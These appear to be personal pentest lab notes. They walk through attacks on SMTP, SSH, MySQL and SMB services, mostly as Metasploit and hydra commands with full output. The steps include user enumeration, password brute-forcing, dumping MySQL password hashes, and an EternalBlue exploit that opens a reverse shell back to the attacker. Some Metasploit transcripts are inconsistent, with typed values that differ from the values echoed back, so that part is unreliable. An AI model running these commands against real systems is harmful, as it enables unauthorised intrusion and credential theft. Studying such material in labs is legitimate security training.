It’s really important to use security layers on protocols for avoiding to be sniffed

From a security perspective, it’s really important to respect the triad CIA: Confidentiality, Integrity, and Availability and to avoid the DAD triad: Disclosure, Alteration, and Destruction

Network vulnerabilities

Devices unauthorized

ARP Spoofing → https://linux.die.net/man/8/arpwatch

DNS Tunneling attacks

Wireless access

Firewall issues

Sniffing attacks

When an attacker has an access to the LAN, he can easily sniff the network with a Man-In-The-Middle (MITM) attack. For doing that, you have different tools:

• https://www.bettercap.org/
• https://www.ettercap-project.org/

Password attacks

We can easily attack services with a tool like hydra. For instance, we can lunch a password attack against the service IMAP to the target for the user lazie:

hydra -l lazie -P /usr/share/wordlists/rockyou.txt <ip> imap

Application attacks

Telnet

FTP

https://www.jscape.com/blog/countering-packet-sniffers-using-encrypted-ftp

NFS

When we discovered a NFS service is enabled on the remote server, we can do an enumeration to identify a potential attack through NFS service:

SMTP

First, we identify the remote server has a postfix service. So, we will enumerate the SMTP service to identify a potential attack through SMTP. We can use metasploit to identify some information regarding SMTP:

# msfconsole
msf6 > use auxiliary/scanner/smtp/smtp_version
msf6 auxiliary(scanner/smtp/smtp_version) > show options # to show options
Module options (auxiliary/scanner/smtp/smtp_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/usin
                                       g-metasploit/basics/using-metasploit.html
   RPORT    25               yes       The target port (TCP)
   THREADS  1                yes       The number of concurrent threads (max one per host)

View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/smtp/smtp_version) > set RHOSTS <ip>
msf6 auxiliary(scanner/smtp/smtp_version) > exploit # lunch the exploit

[+] 10.10.172.108:25      - 10.10.172.108:25 SMTP 220 polosmtp.home ESMTP Postfix (Ubuntu)\x0d\x0a
[*] 10.10.172.108:25      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

If we want to identify the username for a SMTP service:

msf6 > use auxiliary/scanner/smtp/smtp_enum
msf6 auxiliary(scanner/smtp/smtp_enum) > show options

Module options (auxiliary/scanner/smtp/smtp_enum):

   Name       Current Setting              Required  Description
   ----       ---------------              --------  -----------
   RHOSTS                                  yes       The target host(s), see https://docs.metasploit
                                                     .com/docs/using-metasploit/basics/using-metaspl
                                                     oit.html
   RPORT      25                           yes       The target port (TCP)
   THREADS    1                            yes       The number of concurrent threads (max one per h
                                                     ost)
   UNIXONLY   true                         yes       Skip Microsoft bannered servers when testing un
                                                     ix users
   USER_FILE  /opt/metasploit-framework/e  yes       The file that contains a list of probable users
              mbedded/framework/data/word             accounts.
              lists/unix_users.txt

View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/smtp/smtp_enum) > set USER_FILE
USER_FILE => /opt/metasploit-framework/embedded/framework/data/wordlists/unix_users.txt
msf6 auxiliary(scanner/smtp/smtp_enum) > set RHOSTS 10.10.172.108
RHOSTS => 10.10.172.108
msf6 auxiliary(scanner/smtp/smtp_enum) > exploit
[*] 10.10.172.108:25      - 10.10.172.108:25 Banner: 220 polosmtp.home ESMTP Postfix (Ubuntu)
[+] 10.10.172.108:25      - 10.10.172.108:25 Users found: , _apt, administrator, backup, bin, daemon, dnsmasq, games, gnats, irc, landscape, list, lp, lxd, mail, man, messagebus, news, nobody, pollinate, postfix, postmaster, proxy, sshd, sync, sys, syslog, systemd-network, systemd-resolve, systemd-timesync, uucp, uuidd, www-data
[*] 10.10.172.108:25      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Now we know a username, we can try to crack the password with hydra:

hydra -t 16 -l administrator -P /usr/share/wordlists/rockyou.txt -vV 10.10.134.125 ssh
[22][ssh] host: 10.10.134.125   login: administrator   password: alejandro
[STATUS] attack finished for 10.10.134.125 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2023-12-10 15:02:24

And now, we can do a ssh request with the password cracked.

MySQL

First, we need to enumerate the server before the attack. In the example below, the port for MySQL is open:

# nmap -sT 10.10.21.155

Starting Nmap 7.60 ( https://nmap.org ) at 2023-12-11 17:51 GMT
Nmap scan report for ip-10-10-21-155.eu-west-1.compute.internal (10.10.21.155)
Host is up (0.00028s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
3306/tcp open  mysql
MAC Address: 02:1F:5A:23:B2:CB (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds

Now, we will try to exploit:

# msfconsole
msf6 > use auxiliary/admin/mysql/mysql_sql
msf6 auxiliary(admin/mysql/mysql_sql) >
msf6 auxiliary(admin/mysql/mysql_sql) > set PASSWORD root
PASSWORD => alejandro
msf6 auxiliary(admin/mysql/mysql_sql) > set RHOSTS 10.10.21.155
RHOSTS => 10.10.21.155
msf6 auxiliary(admin/mysql/mysql_sql) > set USERNAME password
USERNAME => administrator
msf6 auxiliary(admin/mysql/mysql_sql) > exploit
[*] Running module against 10.10.21.155

[*] 10.10.21.155:3306 - Sending statement: 'select version()'...
[*] 10.10.21.155:3306 -  | 5.7.29-0ubuntu0.18.04.1 |
[*] Auxiliary module execution completed
msf6 auxiliary(admin/mysql/mysql_sql) > set SQL show databases
SQL => show databases
msf6 auxiliary(admin/mysql/mysql_sql) > exploit
[*] Running module against 10.10.21.155

[*] 10.10.21.155:3306 - Sending statement: 'show databases'...
[*] 10.10.21.155:3306 -  | information_schema |
[*] 10.10.21.155:3306 -  | mysql |
[*] 10.10.21.155:3306 -  | performance_schema |
[*] 10.10.21.155:3306 -  | sys |
[*] Auxiliary module execution completed

Now, we can try to identify users:

msf6 > use auxiliary/scanner/mysql/mysql_hashdump
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set RHOSTS 10.10.21.155
RHOSTS => 10.10.21.155
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set USERNAME root
USERNAME => root
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set PASSWORD password
PASSWORD => password
msf6 auxiliary(scanner/mysql/mysql_hashdump) > exploit

[+] 10.10.21.155:3306     - Saving HashString as Loot: root:
[+] 10.10.21.155:3306     - Saving HashString as Loot: mysql.session:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
[+] 10.10.21.155:3306     - Saving HashString as Loot: mysql.sys:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
[+] 10.10.21.155:3306     - Saving HashString as Loot: debian-sys-maint:*D9C95B328FE46FFAE1A55A2DE5719A8681B2F79E
[+] 10.10.21.155:3306     - Saving HashString as Loot: root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[+] 10.10.21.155:3306     - Saving HashString as Loot: carl:*EA031893AA21444B170FC2162A56978B8CEECE18
[*] 10.10.21.155:3306     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

That do this MySQL request:

SELECT user,authentication_string from mysql.user

Now, we can crack it

SMB attack

We can brute force a SMB server with MetaSploit:

msf6 > use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > set RHOSTS 10.10.154.214
msf6 auxiliary(scanner/smb/smb_login) > set RPORTS 445
msf6 auxiliary(scanner/smb/smb_login) > set SMBUser penny
msf6 auxiliary(scanner/smb/smb_login) > set PASS_FILE <path to a wordlist>
msf6 auxiliary(scanner/smb/smb_login) > exploit
[*] 10.10.154.214:445     - 10.10.154.214:445 - Starting SMB login bruteforce
[-] 10.10.154.214:445     - 10.10.154.214:445 - Failed: '.\penny:95',
[-] 10.10.154.214:445     - 10.10.154.214:445 - Failed: '.\penny:98',
[-] 10.10.154.214:445     - 10.10.154.214:445 - Failed: '.\penny:2003',
[-] 10.10.154.214:445     - 10.10.154.214:445 - Failed: '.\penny:2008',
[-] 10.10.154.214:445     - 10.10.154.214:445 - Failed: '.\penny:111111',
[-] 10.10.154.214:445     - 10.10.154.214:445 - Failed: '.\penny:football',
[-] 10.10.154.214:445     - 10.10.154.214:445 - Failed: '.\penny:goat',
[-] 10.10.154.214:445     - 10.10.154.214:445 - Failed: '.\penny:goat',
[-] 10.10.154.214:445     - 10.10.154.214:445 - Failed: '.\penny:god',
[-] 10.10.154.214:445     - 10.10.154.214:445 - Failed: '.\penny:guessme',
[-] 10.10.154.214:445     - 10.10.154.214:445 - Failed: '.\penny:hugs',
[-] 10.10.154.214:445     - 10.10.154.214:445 - Failed: '.\penny:letmein',
[+] 10.10.154.214:445     - 10.10.154.214:445 - Success: '.\penny:leo1234'
[*] 10.10.154.214:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_login) >

We can identify the vulnerability:

msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 10.10.25.166
RHOSTS => 10.10.25.166
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RPORT 139
RPORT => 139
msf6 auxiliary(scanner/smb/smb_ms17_010) > exploit

[-] 10.10.25.166:139      - An SMB Login Error occurred while connecting to the IPC$ tree.
[*] 10.10.25.166:139      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RPORT 445
RPORT => 445
msf6 auxiliary(scanner/smb/smb_ms17_010) > exploit

[+] 10.10.25.166:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.25.166:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

La faille de sécurité MS17 010: https://learn.microsoft.com/fr-fr/security-updates/securitybulletins/2017/ms17-010

msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload 2
payload => generic/shell_reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 10.10.14.170:4444 
[*] 10.10.25.166:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.25.166:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.25.166:445      - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.25.166:445 - The target is vulnerable.
[*] 10.10.25.166:445 - Connecting to target for exploitation.
[+] 10.10.25.166:445 - Connection established for exploitation.
[+] 10.10.25.166:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.25.166:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.25.166:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.25.166:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.25.166:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.25.166:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.25.166:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.25.166:445 - Sending all but last fragment of exploit packet

SMTP

We can use Metasploit for scanning smtp server:

msf6 > use auxiliary/scanner/smtp/smtp_relay

References

• https://resources.infosecinstitute.com/topics/penetration-testing/what-is-enumeration/
• https://www.redhat.com/sysadmin/suid-sgid-sticky-bit
• https://nmap.org/book/scan-methods-null-fin-xmas-scan.html
• https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/4/html/security_guide/ch-exploits
• https://attack.mitre.org/techniques/T1210/